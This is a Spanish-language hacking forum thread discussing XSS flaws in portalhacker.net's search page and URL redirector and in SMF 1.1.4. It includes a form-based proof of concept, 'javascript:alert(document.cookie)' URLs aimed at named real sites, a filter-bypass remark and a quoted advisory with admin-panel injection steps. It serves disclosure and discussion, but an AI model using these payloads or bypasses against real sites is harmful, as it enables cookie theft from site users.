Hace tiempo encontré algunos XSS en elhacker.com y .org pero aún no los reparan a pesar del tiempo que llevan y de que fueron publicados y avisados. Ahora portalhacker.net también tiene un XSS localizado en el buscador de la pagina principal.
PoC:
<form name="buscarform" action="http://www.portalhacker.net/buscar.php" method="post">
<input name="buscar" type="hidden" value="ok">
<input name="query" type="text" size=12 value="Pon tu XSS acá">
<input type="submit" value="Enviar"></form>
Donde puse "Pon tu XSS acá" prueba con enviar la siguiente petición post: "<script>alert(/xss/);</script>"
Después se quejan del porqué les roban las cookies.
Si no me equivoco (Y creo que no) es un Bug en los Smf 1.1.4 ;) ;) ;) ;)
NO..... ese buscador no es propio del foro, el XSS de SMF es otro mas :P al final tienen como 4 XSS incluyendo web y foro pero la diferencia es que los que tu dices son solo locales y tendrías que tener derechos sobre el foro para crear los XSS, este que yo digo cualquiera puede crearlo.
Umm ok..!
Ahora si te doy la razon. xD xD xD
"Despues se quejan"
Por cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!
CitarPor cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!
No hay aún pero no te preocupes ya que no son remotos a menos que se incluya un CSRF aunque dudo mucho que SMF sea vulnerable a eso.
Supongo que te refieres a este:
Citar_____________________________________________________________________
_______
| |
| __________.__ __ __________ __ |
| \______ \ | _____ ____ | | _\______ \ ____ _____/ |_ ______ |
| | | _/ | \__ \ _/ ___\| |/ /| _// _ \ / _ \ __\/ ___/ |
| | | \ |__/ __ \\ \___| < | | ( <_> | <_> ) | \___ \ |
| |______ /____(____ /\___ >__|_ \|____|_ /\____/ \____/|__| /____ > |
| \/ \/ \/ \/ \/ \/ |
|----------------------------------------------------------------------------|
| |
| http://www.blackroots.it staff[at]blackroots[
dot]it |
| |
| Autore : The-Dark_Man && Bled |
|____________________________________________________________________________|
##############################################################################
# #
# XSS smf 1.1.4 #
# #
##############################################################################
Found Xss in the administration...
1----------------------
Go to http://link/[path]/index.php?action=news
Modify the news and insert
<script>alert('Xss')</script>
Save the news! no an alert will be generated in every page!
2---------------------
Go to http://link/[path]/index.php?action=manageboards
Create a new forum with Title:
<script>alert('Xss')</script>
result? XSS ;)
3---------------------
Go here http://link/[path]/index.php?action=membergroups;
Modify or create a new gruop and name it:
<script>alert('Xss')</script>
;)
----------------------
The-Dark_Man && Bled of blackroots.it
Nuevamente portalhacker tiene un nuevo xss:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);
Parece que ese foro se ha descuidado muchisimo, ojala que no le pase lo mismo que a otro que le robaron el dominio por un xss.
Deja mucho de que hablar en cuanto a la calidad del servidor y del estado de la misma página.
¿Será mala administración?
Es increible que un foro de 'hacking' descuide tanto su web/foro :P
parece que ya repararon el bug....
No lo han reparado del todo, la página busca la palabra "javascript" pero... solo en minúsculas, esto sigue funcionando:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);
WHK.. la fuente.. ¬¬
juaz! http://whk.h4ck1ng.net/0days/vuln-2.txt de todas formas ya lo repararon.